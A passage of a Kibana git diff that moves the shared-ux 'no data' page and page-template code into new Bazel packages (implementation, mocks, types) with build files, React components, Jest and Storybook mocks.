b/packages/shared-ux/page/kibana_template/mocks/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react" + ] + }, + "include": [ + "**/*.ts", + "**/*.tsx", + ] +} diff --git a/packages/shared-ux/page/kibana_template/types/BUILD.bazel b/packages/shared-ux/page/kibana_template/types/BUILD.bazel new file mode 100644 index 0000000000000..45cbd0fd4cc42 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/BUILD.bazel @@ -0,0 +1,59 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "types" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-kibana-template-types" + +SRCS = glob( + [ + "*.d.ts", + ] +) + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ +] + +js_library( + name = PKG_DIRNAME, + srcs = SRCS + NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS, + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +alias( + name = "npm_module_types", + actual = ":" + PKG_DIRNAME, + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/kibana_template/types/README.mdx b/packages/shared-ux/page/kibana_template/types/README.mdx new file mode 100644 index 0000000000000..8245f7d8d8c21 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-kibana-template-types + +Empty package generated by @kbn/generate diff --git a/packages/kbn-shared-ux-components/src/page_template/types.ts b/packages/shared-ux/page/kibana_template/types/index.d.ts similarity index 74% rename from packages/kbn-shared-ux-components/src/page_template/types.ts rename to packages/shared-ux/page/kibana_template/types/index.d.ts index 6a8b0d583ed18..8f3129c31817d 100644 --- a/packages/kbn-shared-ux-components/src/page_template/types.ts +++ b/packages/shared-ux/page/kibana_template/types/index.d.ts @@ -9,7 +9,15 @@ import { EuiPageTemplateProps } from '@elastic/eui'; import { SolutionNavProps } from '@kbn/shared-ux-page-solution-nav'; -import { NoDataPageProps } from './no_data_page'; +import { + NoDataConfig, + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; + +export type KibanaPageTemplateKibanaDependencies = NoDataConfigPageKibanaDependencies; +export type KibanaPageTemplateServices = NoDataConfigPageServices; +export type { NoDataConfig } from '@kbn/shared-ux-page-no-data-config-types'; export type KibanaPageTemplateProps = EuiPageTemplateProps & { /** @@ -27,5 +35,5 @@ export type KibanaPageTemplateProps = EuiPageTemplateProps & { * Accepts a configuration object, that when provided, ignores pageHeader and children and instead * displays Agent, Beats, and custom cards to direct users to the right ingest location */ - noDataConfig?: NoDataPageProps; + noDataConfig?: NoDataConfig; }; diff --git a/packages/shared-ux/page/kibana_template/types/package.json b/packages/shared-ux/page/kibana_template/types/package.json new file mode 100644 index 0000000000000..4562e9a1becdd --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-kibana-template-types", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/packages/shared-ux/page/kibana_template/types/tsconfig.json b/packages/shared-ux/page/kibana_template/types/tsconfig.json new file mode 100644 index 0000000000000..7a4adfcdbecff --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/tsconfig.json @@ -0,0 +1,14 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "stripInternal": false, + "types": [] + }, + "include": [ + "*.d.ts" + ] +} diff --git a/packages/kbn-shared-ux-components/BUILD.bazel b/packages/shared-ux/page/no_data/impl/BUILD.bazel similarity index 75% rename from packages/kbn-shared-ux-components/BUILD.bazel rename to packages/shared-ux/page/no_data/impl/BUILD.bazel index 74924f4c6519d..13ffd0694bdd2 100644 --- a/packages/kbn-shared-ux-components/BUILD.bazel +++ b/packages/shared-ux/page/no_data/impl/BUILD.bazel @@ -2,19 +2,17 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config") load("@build_bazel_rules_nodejs//:index.bzl", "js_library") load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") -PKG_DIRNAME = "kbn-shared-ux-components" -PKG_REQUIRE_NAME = "@kbn/shared-ux-components" +PKG_DIRNAME = "impl" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data" SOURCE_FILES = glob( [ "src/**/*.ts", "src/**/*.tsx", - "src/**/*.scss", - "src/**/*.mdx", - "src/**/*.svg", ], exclude = [ "**/*.test.*", + "**/*.stories.*", ], ) @@ -41,22 +39,10 @@ NPM_MODULE_EXTRA_FILES = [ # eg. "@npm//lodash" RUNTIME_DEPS = [ "@npm//@elastic/eui", - "@npm//@emotion/css", - "@npm//@emotion/react", "@npm//classnames", - "@npm//react-use", "@npm//react", - "@npm//rxjs", - "@npm//url-loader", - "//packages/kbn-i18n-react", - "//packages/kbn-i18n", - "//packages/kbn-shared-ux-services", - "//packages/kbn-shared-ux-storybook", - "//packages/kbn-shared-ux-utility", "//packages/shared-ux/avatar/solution", "//packages/shared-ux/card/no_data/impl", - "//packages/shared-ux/link/redirect_app/impl", - "//packages/shared-ux/page/solution_nav", "//packages/shared-ux/prompt/no_data_views/impl", ] @@ -71,24 +57,14 @@ RUNTIME_DEPS = [ # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ "@npm//@elastic/eui", - "@npm//@emotion/css", - "@npm//@emotion/react", "@npm//@types/classnames", "@npm//@types/jest", "@npm//@types/node", "@npm//@types/react", - "@npm//react-use", - "@npm//rxjs", "//packages/kbn-ambient-ui-types", - "//packages/kbn-i18n-react:npm_module_types", - "//packages/kbn-i18n:npm_module_types", - "//packages/kbn-shared-ux-services:npm_module_types", - "//packages/kbn-shared-ux-storybook:npm_module_types", - "//packages/kbn-shared-ux-utility:npm_module_types", "//packages/shared-ux/avatar/solution:npm_module_types", "//packages/shared-ux/card/no_data/impl:npm_module_types", - "//packages/shared-ux/link/redirect_app/impl:npm_module_types", - "//packages/shared-ux/page/solution_nav:npm_module_types", + "//packages/shared-ux/page/no_data/types:npm_module_types", "//packages/shared-ux/prompt/no_data_views/impl:npm_module_types", ] diff --git a/packages/shared-ux/page/no_data/impl/README.mdx b/packages/shared-ux/page/no_data/impl/README.mdx new file mode 100644 index 0000000000000..e5dd8c235c4ce --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data + +Empty package generated by @kbn/generate diff --git a/packages/kbn-shared-ux-components/jest.config.js b/packages/shared-ux/page/no_data/impl/jest.config.js similarity index 81% rename from packages/kbn-shared-ux-components/jest.config.js rename to packages/shared-ux/page/no_data/impl/jest.config.js index c2ac8c3a57106..1b7ff2aafe740 100644 --- a/packages/kbn-shared-ux-components/jest.config.js +++ b/packages/shared-ux/page/no_data/impl/jest.config.js @@ -8,6 +8,6 @@ module.exports = { preset: '@kbn/test', - rootDir: '../..', - roots: ['/packages/kbn-shared-ux-components'], + rootDir: '../../../../..', + roots: ['/packages/shared-ux/page/no_data/impl'], }; diff --git a/packages/kbn-shared-ux-components/package.json b/packages/shared-ux/page/no_data/impl/package.json similarity index 80% rename from packages/kbn-shared-ux-components/package.json rename to packages/shared-ux/page/no_data/impl/package.json index 948df7fadd712..1f09f616a765f 100644 --- a/packages/kbn-shared-ux-components/package.json +++ b/packages/shared-ux/page/no_data/impl/package.json @@ -1,5 +1,5 @@ { - "name": "@kbn/shared-ux-components", + "name": "@kbn/shared-ux-page-no-data", "private": true, "version": "1.0.0", "main": "./target_node/index.js", diff --git a/packages/shared-ux/page/no_data/impl/src/action_card.tsx b/packages/shared-ux/page/no_data/impl/src/action_card.tsx new file mode 100644 index 0000000000000..0dec8c677b12c --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/action_card.tsx @@ -0,0 +1,30 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; + +import { NoDataCard, NoDataCardProps } from '@kbn/shared-ux-card-no-data'; +import { ActionCardProps } from '@kbn/shared-ux-page-no-data-types'; + +export type NoDataPageActions = NoDataCardProps; + +export const KEY_ELASTIC_AGENT = 'elasticAgent'; + +export const ActionCard = ({ action }: ActionCardProps) => { + const actionKeys = Object.keys(action); + + if (actionKeys.length !== 1) { + return null; + } + + const actionKey = actionKeys[0]; + const key = + actionKey === KEY_ELASTIC_AGENT ? 'empty-page-agent-action' : `empty-page-${actionKey}-action`; + + return ; +}; diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/index.ts b/packages/shared-ux/page/no_data/impl/src/index.ts similarity index 65% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/index.ts rename to packages/shared-ux/page/no_data/impl/src/index.ts index a6f8c91f7614c..5438612b541bd 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/index.ts +++ b/packages/shared-ux/page/no_data/impl/src/index.ts @@ -7,5 +7,10 @@ */ export { NoDataPage } from './no_data_page'; -export type { NoDataPageProps } from './types'; -export { NoDataConfigPage, NoDataConfigPageWithSolutionNavBar } from './no_data_config_page'; +export type { + NoDataPageProps, + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +export { NoDataPageKibanaProvider, NoDataPageProvider } from './services'; diff --git a/packages/shared-ux/page/no_data/impl/src/no_data_page.stories.tsx b/packages/shared-ux/page/no_data/impl/src/no_data_page.stories.tsx new file mode 100644 index 0000000000000..6b56a44638358 --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/no_data_page.stories.tsx @@ -0,0 +1,39 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; + +import { NoDataPageStorybookMock } from '@kbn/shared-ux-page-no-data-mocks'; +import type { NoDataPageStorybookParams } from '@kbn/shared-ux-page-no-data-mocks'; + +import { NoDataPage as Component } from './no_data_page'; + +import { NoDataPageProvider } from './services'; +import mdx from '../README.mdx'; + +const mock = new NoDataPageStorybookMock(); + +export default { + title: 'No Data/Page/No Data Page', + description: 'A component to display when there is no data available', + parameters: { + docs: { + page: mdx, + }, + }, +}; + +export const NoDataPage = (params: NoDataPageStorybookParams) => { + return ( + + + + ); +}; + +NoDataPage.argTypes = mock.getArgumentTypes(); diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.test.tsx b/packages/shared-ux/page/no_data/impl/src/no_data_page.test.tsx similarity index 81% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.test.tsx rename to packages/shared-ux/page/no_data/impl/src/no_data_page.test.tsx index b9474285469e1..576cf4f3b7230 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.test.tsx +++ b/packages/shared-ux/page/no_data/impl/src/no_data_page.test.tsx @@ -9,14 +9,15 @@ import React from 'react'; import { mountWithIntl } from '@kbn/test-jest-helpers'; import { NoDataCard } from '@kbn/shared-ux-card-no-data'; -import { SharedUxServicesProvider, mockServicesFactory } from '@kbn/shared-ux-services'; +import { getNoDataPageServicesMock } from '@kbn/shared-ux-page-no-data-mocks'; import { NoDataPage } from './no_data_page'; +import { NoDataPageProvider } from './services'; describe('NoDataPage', () => { test('render', () => { const component = mountWithIntl( - + { logo={'logoKibana'} docsLink="test" /> - + ); expect(component.find('h1').html()).toContain('Welcome to Elastic Analytics!'); expect(component.find(NoDataCard).length).toBe(1); diff --git a/packages/shared-ux/page/no_data/impl/src/no_data_page.tsx b/packages/shared-ux/page/no_data/impl/src/no_data_page.tsx new file mode 100644 index 0000000000000..1bc93123aea95 --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/no_data_page.tsx @@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; +import classNames from 'classnames'; + +import { EuiLink, EuiSpacer, EuiText, EuiTextColor } from '@elastic/eui'; +import { i18n } from '@kbn/i18n'; +import { FormattedMessage } from '@kbn/i18n-react'; + +import { KibanaSolutionAvatar } from '@kbn/shared-ux-avatar-solution'; +import type { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; + +import { ActionCard } from './action_card'; + +export const NoDataPage = ({ + solution, + logo, + action, + docsLink, + pageTitle, + className, +}: NoDataPageProps) => { + const title = + pageTitle || + i18n.translate('sharedUXPackages.noDataPage.welcomeTitle', { + defaultMessage: 'Welcome to Elastic {solution}!', + values: { solution }, + }); + + const link = ( + + + + ); + + const message = ( + + ); + + return ( +
+ + + +

{title}

+ +

{message}

+ + + + +
+ ); +}; diff --git a/packages/shared-ux/page/no_data/impl/src/services.tsx b/packages/shared-ux/page/no_data/impl/src/services.tsx new file mode 100644 index 0000000000000..3d10cc5547c92 --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/services.tsx @@ -0,0 +1,33 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC } from 'react'; + +import { NoDataCardKibanaProvider, NoDataCardProvider } from '@kbn/shared-ux-card-no-data'; + +import type { + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +/** + * A Context Provider that provides services to the component and its dependencies. + */ +export const NoDataPageProvider: FC = ({ children, ...services }) => { + return {children}; +}; + +/** + * Kibana-specific Provider that maps dependencies to services. + */ +export const NoDataPageKibanaProvider: FC = ({ + children, + ...dependencies +}) => { + return {children}; +}; diff --git a/packages/kbn-shared-ux-components/tsconfig.json b/packages/shared-ux/page/no_data/impl/tsconfig.json similarity index 79% rename from packages/kbn-shared-ux-components/tsconfig.json rename to packages/shared-ux/page/no_data/impl/tsconfig.json index dd55bdb28a632..40ed24ecac4d2 100644 --- a/packages/kbn-shared-ux-components/tsconfig.json +++ b/packages/shared-ux/page/no_data/impl/tsconfig.json @@ -1,5 +1,5 @@ { - "extends": "../../tsconfig.bazel.json", + "extends": "../../../../../tsconfig.bazel.json", "compilerOptions": { "declaration": true, "declarationMap": true, @@ -10,7 +10,7 @@ "types": [ "jest", "node", - "@emotion/react/types/css-prop", + "react", "@kbn/ambient-ui-types", ] }, diff --git a/packages/shared-ux/page/no_data/mocks/BUILD.bazel b/packages/shared-ux/page/no_data/mocks/BUILD.bazel new file mode 100644 index 0000000000000..9296b28ed96f1 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/BUILD.bazel @@ -0,0 +1,141 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "mocks" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-mocks" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + ], + exclude = [ + "**/*.config.js", + "**/*.mock.*", + "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "//packages/shared-ux/card/no_data/mocks", + "//packages/shared-ux/storybook/mock", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. "//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", + "//packages/shared-ux/page/no_data/types", + "//packages/shared-ux/card/no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data/mocks/README.md b/packages/shared-ux/page/no_data/mocks/README.md new file mode 100644 index 0000000000000..5714e473d1f0c --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/README.md @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-mocks + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/no_data/mocks/package.json b/packages/shared-ux/page/no_data/mocks/package.json new file mode 100644 index 0000000000000..d6051a988cdc4 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-no-data-mocks", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/src/plugins/shared_ux/common/index.ts b/packages/shared-ux/page/no_data/mocks/src/index.ts old mode 100755 new mode 100644 similarity index 56% rename from src/plugins/shared_ux/common/index.ts rename to packages/shared-ux/page/no_data/mocks/src/index.ts index 92dee001d9012..a17ff47a67775 --- a/src/plugins/shared_ux/common/index.ts +++ b/packages/shared-ux/page/no_data/mocks/src/index.ts @@ -6,8 +6,10 @@ * Side Public License, v 1. */ -/** The ID of the Shared UX plugin. */ -export const PLUGIN_ID = 'sharedUX'; +export { + getServicesMock as getNoDataPageServicesMock, + getKibanaDependenciesMock as getNoDataPageKibanaDependenciesMock, +} from './jest'; -/** The name of the Shared UX plugin. */ -export const PLUGIN_NAME = 'sharedUX'; +export { NoDataPageStorybookMock } from './storybook'; +export type { Params as NoDataPageStorybookParams } from './storybook'; diff --git a/packages/shared-ux/page/no_data/mocks/src/jest.ts b/packages/shared-ux/page/no_data/mocks/src/jest.ts new file mode 100644 index 0000000000000..fd44142c2f597 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/src/jest.ts @@ -0,0 +1,64 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import deepmerge from 'deepmerge'; +import { isPlainObject } from 'lodash'; + +import type { + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +import { + getNoDataCardServicesMock, + getNoDataCardKibanaDependenciesMock, +} from '@kbn/shared-ux-card-no-data-mocks'; + +const defaultParams = { + canAccessFleet: true, +}; + +export const getServicesMock = (params: Partial = defaultParams) => { + const canAccessFleet = + params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet; + + const services: NoDataPageServices = { + ...getNoDataCardServicesMock(), + canAccessFleet, + }; + + return services; +}; + +/** + * Return a Jest mock of the Kibana dependencies for the `NoDataPageKibanaProvider`. + */ +export const getKibanaDependenciesMock = ( + params: Partial = defaultParams +): NoDataPageKibanaDependencies => { + const integrations = + params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet; + + return deepmerge( + { + coreStart: { + application: { + capabilities: { + navLinks: { + integrations, + }, + }, + }, + }, + }, + getNoDataCardKibanaDependenciesMock(), + { + isMergeableObject: isPlainObject, + } + ); +}; diff --git a/packages/shared-ux/page/no_data/mocks/src/storybook.ts b/packages/shared-ux/page/no_data/mocks/src/storybook.ts new file mode 100644 index 0000000000000..899ddf819a7d6 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/src/storybook.ts @@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; +import type { NoDataPageProps, NoDataPageServices } from '@kbn/shared-ux-page-no-data-types'; +import { NoDataCardStorybookMock } from '@kbn/shared-ux-card-no-data-mocks'; +import type { NoDataCardStorybookParams } from '@kbn/shared-ux-card-no-data-mocks'; + +type PropArguments = Pick; + +export type Params = ArgumentParams & NoDataCardStorybookParams; + +const dataCardMock = new NoDataCardStorybookMock(); + +export class NoDataPageStorybookMock extends AbstractStorybookMock< + NoDataPageProps, + NoDataPageServices, + PropArguments +> { + propArguments = { + solution: { + control: 'text', + defaultValue: 'Observability', + }, + logo: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + docsLink: { + control: 'text', + defaultValue: 'docs/link', + }, + pageTitle: { + control: 'text', + defaultValue: '', + }, + }; + + serviceArguments = {}; + + dependencies = [dataCardMock]; + + getProps(params?: Params): NoDataPageProps { + return { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }; + } + + getServices(params: Params): NoDataPageServices { + return { ...dataCardMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/no_data/mocks/tsconfig.json b/packages/shared-ux/page/no_data/mocks/tsconfig.json new file mode 100644 index 0000000000000..dc96ec41f9035 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react" + ] + }, + "include": [ + "**/*.ts", + "**/*.tsx", + ] +} diff --git a/packages/shared-ux/page/no_data/types/BUILD.bazel b/packages/shared-ux/page/no_data/types/BUILD.bazel new file mode 100644 index 0000000000000..618a82a8f6a98 --- /dev/null +++ b/packages/shared-ux/page/no_data/types/BUILD.bazel @@ -0,0 +1,59 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "types" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-types" + +SRCS = glob( + [ + "*.d.ts", + ] +) + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ +] + +js_library( + name = PKG_DIRNAME, + srcs = SRCS + NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS, + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +alias( + name = "npm_module_types", + actual = ":" + PKG_DIRNAME, + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data/types/README.mdx b/packages/shared-ux/page/no_data/types/README.mdx new file mode 100644 index 0000000000000..7890d0ef8a3c4 --- /dev/null +++ b/packages/shared-ux/page/no_data/types/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-types + +Empty package generated by @kbn/generate diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts b/packages/shared-ux/page/no_data/types/index.d.ts similarity index 66% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts rename to packages/shared-ux/page/no_data/types/index.d.ts index e22f7a7b81a77..3db9e80c950c9 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts +++ b/packages/shared-ux/page/no_data/types/index.d.ts @@ -7,31 +7,50 @@ */ import { CommonProps } from '@elastic/eui'; -import { NoDataCardProps } from '@kbn/shared-ux-card-no-data'; +import { + NoDataCardProps, + NoDataCardServices, + NoDataCardKibanaDependencies, +} from '@kbn/shared-ux-card-no-data-types'; export type NoDataPageActions = NoDataCardProps; -export interface NoDataPageProps extends CommonProps { +export interface ActionCardProps { /** - * Single name for the current solution, used to auto-generate the title, logo, description, and button label + * An object of `NoDataPageActions`. + * + * Use `elasticAgent` as the primary key for pre-configured cards of this type. + * Otherwise use a custom key that contains `EuiCard` props. */ - solution: string; + action: Record; +} + +export interface NoDataPageProps extends CommonProps, ActionCardProps { /** - * Optionally replace the auto-generated logo + * Single name for the current solution, used to auto-generate the title, logo, description, and button label */ - logo?: string; + solution: string; /** * Required to set the docs link for the whole solution */ docsLink: string; /** - * Optionally replace the auto-generated page title (h1) + * Optionally replace the auto-generated logo */ - pageTitle?: string; + logo?: string; /** - * An object of `NoDataPageActions`. - * Use `elasticAgent` as the primary key for pre-configured cards of this type. - * Otherwise use a custom key that contains `EuiCard` props. + * Optionally replace the auto-generated page title (h1) */ - action: Record; + pageTitle?: string; } + +/** + * A list of services that are consumed by this component. + */ +export type NoDataPageServices = NoDataCardServices; + +/** + * An interface containing a collection of Kibana plugins and services required to + * render this component. + */ +export type NoDataPageKibanaDependencies = NoDataCardKibanaDependencies; diff --git a/packages/shared-ux/page/no_data/types/package.json b/packages/shared-ux/page/no_data/types/package.json new file mode 100644 index 0000000000000..8e9dce1b11f45 --- /dev/null +++ b/packages/shared-ux/page/no_data/types/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-no-data-types", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} diff --git a/packages/shared-ux/page/no_data/types/tsconfig.json b/packages/shared-ux/page/no_data/types/tsconfig.json new file mode 100644 index 0000000000000..7a4adfcdbecff --- /dev/null +++ b/packages/shared-ux/page/no_data/types/tsconfig.json @@ -0,0 +1,14 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "stripInternal": false, + "types": [] + }, + "include": [ + "*.d.ts" + ] +} diff --git a/packages/shared-ux/page/no_data_config/impl/BUILD.bazel b/packages/shared-ux/page/no_data_config/impl/BUILD.bazel new file mode 100644 index 0000000000000..73c069342a5a0 --- /dev/null +++ 